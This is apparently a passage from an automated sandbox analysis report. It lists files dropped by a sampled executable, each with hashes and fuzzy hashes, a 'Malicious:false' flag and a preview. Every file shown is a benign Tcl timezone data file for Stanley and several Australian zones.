                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Stanley) {.. {-9223372036854775808 -13884 0 LMT}.. {-2524507716 -13884 0 SMT}.. {-1824235716 -14400 0 -04}.. {-1018209600 -10800 1 -04}.. {-1003093200 -14400 0 -04}.. {-986760000 -10800 1 -04}.. {-971643600 -14400 0 -04}.. {-954705600 -10800 1 -04}.. {-939589200 -14400 0 -04}.. {-923256000 -10800 1 -04}.. {-908139600 -14400 0 -04}.. {-891806400 -10800 1 -04}.. {-876690000 -14400 0 -04}.. {-860356800 -10800 1 -04}.. {420606000 -7200 0 -03}.. {433303200 -7200 1 -03}.. {452052000 -10800 0 -03}.. {464151600 -7200 1 -03}.. {483501600 -10800 0 -03}.. {495597600 -14400 0 -04}.. {495604800 -10800 1 -04}.. {514350000 -14400 0 -04}.. {527054400 -10800 1 -04}.. {545799600 -14400 0 -04}.. {558504000 -10800 1 -04}.. {577249200 -14400 0 -04}.. {589953600 -10800 1 -04}.. {608698800 -14400 0 -04}.. {621403200 -10800 1 -04}.. {640753200 -14400 0 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.862270414049974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjpMFBx/h4QWCCj1:SlSWB9vsM3yI9kHAIgmON/2DCeMFB/4d
                                                                                                                                                                                                                              MD5:2EF41863430897F45E0CBB51E6A44069
                                                                                                                                                                                                                              SHA1:8E9561060E9509FAF235E5E033FC9C2918E438DB
                                                                                                                                                                                                                              SHA-256:DF7CBDDCBB2F5926A07D19A35739E5B8DCD9733C037F7D1FF95753C28D574674
                                                                                                                                                                                                                              SHA-512:9D3A37D64DCCCA28093C30FAB595690D021FACEC15F351A77CA33A779D645D305A2FA031869F0DE3B0404C498C2C321D3D02E4DC592D3C632F6700F5DCB54900
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/ACT) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.894755849491153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:j8SY62BXovlCyRL8pJXa4NyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:j8X3Xzgl3PaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:94E1A0C4326D09AF103107E64625CC6C
                                                                                                                                                                                                                              SHA1:C026565F020EB158309549D98313632BAA79205F
                                                                                                                                                                                                                              SHA-256:5C43D3152982BCFD5B9F51D0E909CF3A558BED1C270FEFFE030531D38D6F91B7
                                                                                                                                                                                                                              SHA-512:CA08A8BC0EB740D59650FE0A9E56D9E169348AD0994F2BFFD6CCFBF9CC42E82F892FB719E80C4E2084B5702E9725C651359EE3066BD71BB19397EA83B6A68430
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Adelaide) {.. {-9223372036854775808 33260 0 LMT}.. {-2364110060 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1 ACDT}.. {320776200 34200 0 ACST}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):674
                                                                                                                                                                                                                              Entropy (8bit):4.32071371733564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ELmdHLOYCvSi0xT0ryRIvUr0obZv:5ELe6dvSi6L
                                                                                                                                                                                                                              MD5:900B39F1D4AB93A445F37B6C0A8DE3D9
                                                                                                                                                                                                                              SHA1:DE82800779DCB8094C395B5024BD01FFA3C3BB8C
                                                                                                                                                                                                                              SHA-256:0D3C39EDAB34A8DB31A658A1549772F7D69EB57565E40AA87B707953A2D854A4
                                                                                                                                                                                                                              SHA-512:8D115D1D14FE6FF21A4AE77E3AAC075E6A877214E568956B9A4FD2E75A46E458CAA5AE26B483F128B4C62960D73BD7543BC32F22B760059423B3D9ABCBA24B6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Brisbane) {.. {-9223372036854775808 36728 0 LMT}.. {-2366791928 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8437
                                                                                                                                                                                                                              Entropy (8bit):3.902306256303896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QZSSY62BXovldRL8q75aANyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:QZSX3X2QfPaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:1553DAAB804A6C9BB15D711554980D3B
                                                                                                                                                                                                                              SHA1:5E3161B1FBB4C246DCB5E11ABD94095121CE38ED
                                                                                                                                                                                                                              SHA-256:734F295BD0B558BDF6178DE62151B8913699D08AB2B1D101C55B8DEBC410074C
                                                                                                                                                                                                                              SHA-512:06B21886070E39E390ECBD18841B7FDBFCA2C7C8573495D2BAA2B92EB113CD1C73C18D73C49DE3C49572CBCBCBED2FAD3248BC651BEB825A1E089B1DEDEFCBFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Broken_Hill) {.. {-9223372036854775808 33948 0 LMT}.. {-2364110748 36000 0 AEST}.. {-2314951200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.851279484907769
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjnSV1+QWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DCcq+DCyB
                                                                                                                                                                                                                              MD5:8944D3DF8FBECC03A8FB18C3B2DA3B53
                                                                                                                                                                                                                              SHA1:6B17B38D6560592CA49840C47DB9BDA7E79F9F76
                                                                                                                                                                                                                              SHA-256:5FE3CED97293FE0573D5ECE0CEF59CE5DDB4C57BC568AE7199E77B01D3ADE17C
                                                                                                                                                                                                                              SHA-512:907D8BB7EA840E0B3AC683884F2F709A2C06D67CE9258BE46400A0DA63581A9B1403A44FA43E1059BE8F5C7E06F9FA05C176309AD6295317BF14F0E9FA5741E4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/Canberra) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.79231670095588
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DCkx+4DCVDy:MByMjUQVv8At2s4Ky
                                                                                                                                                                                                                              MD5:0C1DFC0877CE8EB08007B7C2B7AF2D87
                                                                                                                                                                                                                              SHA1:02F835BE2DA4FCA79DC2A6959BB4EB6ACC8DF708
                                                                                                                                                                                                                              SHA-256:1DD4EC4ED4F854E2EF6162B2F28C89208710F8EC5AABB95FFA9425D3FBBCAB13
                                                                                                                                                                                                                              SHA-512:358347045915B7D10940DB15E49528D0C636BEC1BE70129847D0B9D034F9E96E847394D88358E87D98A9E581605A3C2AB917B85FDE1296F290B4194BB7E3FA46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Currie) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):437
                                                                                                                                                                                                                              Entropy (8bit):4.508468081487136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862pmdHPCvZUjMWpXgda/gd026Xgdvgd+v:5peKvZqMSX+4+56X+v+Q
                                                                                                                                                                                                                              MD5:A81864B2C0BD7BF81F4FA21F17800059
                                                                                                                                                                                                                              SHA1:518AC9E040A17083ED3962F4FBB47D1D83764FF7
                                                                                                                                                                                                                              SHA-256:AC004FD4B3C536406991EC13EBB3E64E0EC0C7B264BC18C0700C8FA545868155
                                                                                                                                                                                                                              SHA-512:3C24F4C2CC3072B3E820FCC1C68A747DCCBB9481FE743C1555783CC932DCBA44FE4851A732D24EABF62E845474D4E1278F120A04DB7549A18C7C49C31FB8D425
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Darwin) {.. {-9223372036854775808 31400 0 LMT}.. {-2364108200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):759
                                                                                                                                                                                                                              Entropy (8bit):4.110997549215461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862EmdHvOYCvV2mV22wF2nUV2CF2+V2pCwF21UF2biV2cHVKF25V2VF2cV2tFq:5Eemdvg2wQCKZ4j5c0LVmtH1iknohwQT
                                                                                                                                                                                                                              MD5:1BC8DBD2E24606EFA49F933034FC0EEF
                                                                                                                                                                                                                              SHA1:A511695A1B87A689C6BFF65257C11D3962FDDA3D
                                                                                                                                                                                                                              SHA-256:79D0C770A304360DB33F3D1EF7B3935F1E4E8125893E0DCE683AC35A51302CFB
                                                                                                                                                                                                                              SHA-512:A839D390D70F22FC833322029B732F3AE68FF48793B07005041BD12322DD6E5D5E5FF31787AA004A507A57F8FC245133891F266C4EF19D49F085E6B412E5B04C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Eucla) {.. {-9223372036854775808 30928 0 LMT}.. {-2337928528 31500 0 +0945}.. {-1672555500 35100 1 +0945}.. {-1665384300 31500 0 +0945}.. {-883637100 35100 1 +0945}.. {-876120300 31500 0 +0945}.. {-860395500 35100 1 +0945}.. {-844670700 31500 0 +0945}.. {-836473500 35100 0 +0945}.. {152039700 35100 1 +0945}.. {162926100 31500 0 +0945}.. {436295700 35100 1 +0945}.. {447182100 31500 0 +0945}.. {690311700 35100 1 +0945}.. {699383700 31500 0 +0945}.. {1165079700 35100 1 +0945}.. {1174756500 31500 0 +0945}.. {1193505300 35100 1 +0945}.. {1206810900 31500 0 +0945}.. {1224954900 35100 1 +0945}.. {1238260500 31500 0 +0945}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8734
                                                                                                                                                                                                                              Entropy (8bit):3.8515786470328823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aOqigkx6WsYyS39nQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:aOq05hnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:5E04BF8E1DEBFCC4130FDD1BBD67B2DF
                                                                                                                                                                                                                              SHA1:796AADCE7BB2FAF5E6FC916C941A4E3DCAFACC9E
                                                                                                                                                                                                                              SHA-256:D813F6A97BEFC22CA4F24C59EB755D269B9C68A449CC7CF0D2C61F911860EBE7
                                                                                                                                                                                                                              SHA-512:3A69CF1D1F57D6BD39E5F4DAF76BBB06A749D42BEB29452A0A5BDAA68F5DACC0DF176EDDA7A083F5B5B84FC651926C09D46CAAD2F6C4F1595AB9CCA1A958D653
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Hobart) {.. {-9223372036854775808 35356 0 LMT}.. {-2345795356 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-1646640000 39600 1 AEDT}.. {-1635753600 36000 0 AEST}.. {-1615190400 39600 1 AEDT}.. {-1604304000 36000 0 AEST}.. {-1583920800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AES
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.912882643701746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIoGEoPHAIgjGg6N/2DCkx/2DCPGUv:MByMjeXV6t2a8v
                                                                                                                                                                                                                              MD5:425DC7B1E31F4AA41DAD74E3C9AE3562
                                                                                                                                                                                                                              SHA1:D92A3269F7BF5EC00F082C64CEF6E20C43017180
                                                                                                                                                                                                                              SHA-256:4D84E4040FBC529C9E0366BB74D0CFADEEEEDA0DFCC6C2C9204DED6C6455CAC3
                                                                                                                                                                                                                              SHA-512:F3031F16C0D00D9F8A38CD378F599EB3E63F4FF85F120DB38E3013E93F08E6F512D969F164BBC88CD625910FB3E086F3352E5B8FFC1373C3CC98F363FB3FD3F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Lord_Howe)]} {.. LoadTimeZoneFile Australia/Lord_Howe..}..set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):824
                                                                                                                                                                                                                              Entropy (8bit):4.249672335529665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862gtmdHVCvCi0xT0ryRIvUr0obbty/ywtUj3yv:5gteMvCi6Xlt8
                                                                                                                                                                                                                              MD5:504A422280E0459A2126E7CB02F527E6
                                                                                                                                                                                                                              SHA1:EF61B98EFB1E44EE59020E99A69EA67D6B8ACFC2
                                                                                                                                                                                                                              SHA-256:01B278309353849CC2FDF62A30E2FF483833D5713CF5E329252738BE6F2C0A84
                                                                                                                                                                                                                              SHA-512:BFDAAD56D817CD3AAB17DFD0A33EFDD422645BC542ABE269C0F8520E33796DF4F19EAB2E40BFC6C4AF93EF654239B8F2E285639B4662040D865B9C340A23CFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lindeman) {.. {-9223372036854775808 35756 0 LMT}.. {-2366790956 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}.. {709912800 36000 0 AEST}.. {719942400 39600 1 AEDT}.. {731433600 36000 0 AEST}.. {751996800 39600 1 AEDT}.. {762883200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7764
                                                                                                                                                                                                                              Entropy (8bit):3.5615258807990537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pmz39IyKxb/JbcD9gKniAF23QbNS1fEGXALNbbT2JFJ/FaKaTQ9ZJhRVK:p+cpVKniAF2AbkFKL
                                                                                                                                                                                                                              MD5:10F983F4683CDE13A1228AC0B04D8513
                                                                                                                                                                                                                              SHA1:45378BA5949BE53D698108F50FECFF50C9E3D296
                                                                                                                                                                                                                              SHA-256:76D1F1ED67B8F8D6903789C2FDDF79590A83677972D416F5F3C9687614EC6238
                                                                                                                                                                                                                              SHA-512:D60D802EF215A33750E4F859657BA12A67084B1E9FCF1B4A7CEEE7B9D816BC2C6670775D93C88EC8380CDD7790AD574133D6F90F0828F848313C26583B2F196A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lord_Howe) {.. {-9223372036854775808 38180 0 LMT}.. {-2364114980 36000 0 AEST}.. {352216800 37800 0 +1030}.. {372785400 41400 1 +1030}.. {384273000 37800 0 +1030}.. {404839800 41400 1 +1030}.. {415722600 37800 0 +1030}.. {436289400 41400 1 +1030}.. {447172200 37800 0 +1030}.. {467739000 41400 1 +1030}.. {478621800 37800 0 +1030}.. {488984400 37800 0 +1030}.. {499188600 39600 1 +1030}.. {511282800 37800 0 +1030}.. {530033400 39600 1 +1030}.. {542732400 37800 0 +1030}.. {562087800 39600 1 +1030}.. {574786800 37800 0 +1030}.. {594142200 39600 1 +1030}.. {606236400 37800 0 +1030}.. {625591800 39600 1 +1030}.. {636476400 37800 0 +1030}.. {657041400 39600 1 +1030}.. {667926000 37800 0 +1030}.. {688491000 39600 1 +1030}.. {699375600 37800 0 +1030}.. {719940600 39600 1 +1030}.. {731430000 37800 0 +1030}.. {751995000 39600 1 +1030}.. {762
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8341
                                                                                                                                                                                                                              Entropy (8bit):3.8532171550973526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Yyigkp2EUyn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:Yy3VnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:40D06B80A4A0DB415270EFD9698B97BF
                                                                                                                                                                                                                              SHA1:1999F0E8C7EBAA11BD21D64D9E07FA911F13C64C
                                                                                                                                                                                                                              SHA-256:F21B9EA51C0D41BAD0420FE0601E5A4B491FB895856F4BDDF6541D704469D92F
                                                                                                                                                                                                                              SHA-512:E47D597CC85D177CF2804C44C216EB4C5B74472457F15F697704311A847BF8A051DCAFD26FA61DD689555F35640151E26F25D5DC5319EFEFEA62AD86657A4A95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Melbourne) {.. {-9223372036854775808 34792 0 LMT}.. {-2364111592 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.893713405897538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjREeQWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DC5eDCyB
                                                                                                                                                                                                                              MD5:80B7CDD1EA5A5308CE84C038180005F2
                                                                                                                                                                                                                              SHA1:B7CA15B58ADA8CA3EB74B7971073022D57D8EE70
                                                                                                                                                                                                                              SHA-256:73D7C9E207E61ACF8DF7242BDCD84488189033E22A84873A953B65DE02FA1B0B
                                                                                                                                                                                                                              SHA-512:F627F5FF335600AC9158D6A0D3694AB7E70180177449C17B5605BBF7B1B7F8FB447A9C207F4E1BCB627074DB47B8A66F5D78E03C6DB8FA17F8BDD6AABB331665
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/NSW) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.830368875485429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjbvvXHAIgoXjbBvRL/2QWCCjsrQWCCjbi:SlSWB9vsM3yIFHAIg2N/2DCZrDCl
                                                                                                                                                                                                                              MD5:14CB7EA1C028F457345EBEB8ADDC9237
                                                                                                                                                                                                                              SHA1:208BF676F56533BA271D1B98363A766DF17CF6F2
                                                                                                                                                                                                                              SHA-256:A983C9CAD7E542CAED43B083E68CD2B782959A4B54015F374C29250D3ACF9B8D
                                                                                                                                                                                                                              SHA-512:099F65E5FA705FD7257CF7B8E103905EE313C6D082844F69CCD3F318E3E7F4098B29F952FA0AA28655E1FE290A0FB2E809911088315889DE7CAAF0E04698C2FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Darwin)]} {.. LoadTimeZoneFile Australia/Darwin..}..set TZData(:Australia/North) $TZData(:Australia/Darwin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):739
                                                                                                                                                                                                                              Entropy (8bit):4.31793586514766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB8623mdHCBdCvmlXz6zezzOz4iaLYvzkzi4zm5fVcBhg8mfev:53eCB0v4+e3Oz4iaLYbkzi4zxhfqw
                                                                                                                                                                                                                              MD5:01B1A88867472AD60B8F5C0E1648E3ED
                                                                                                                                                                                                                              SHA1:9975EA750458E8061DD8A83585675CB7E4910CA6
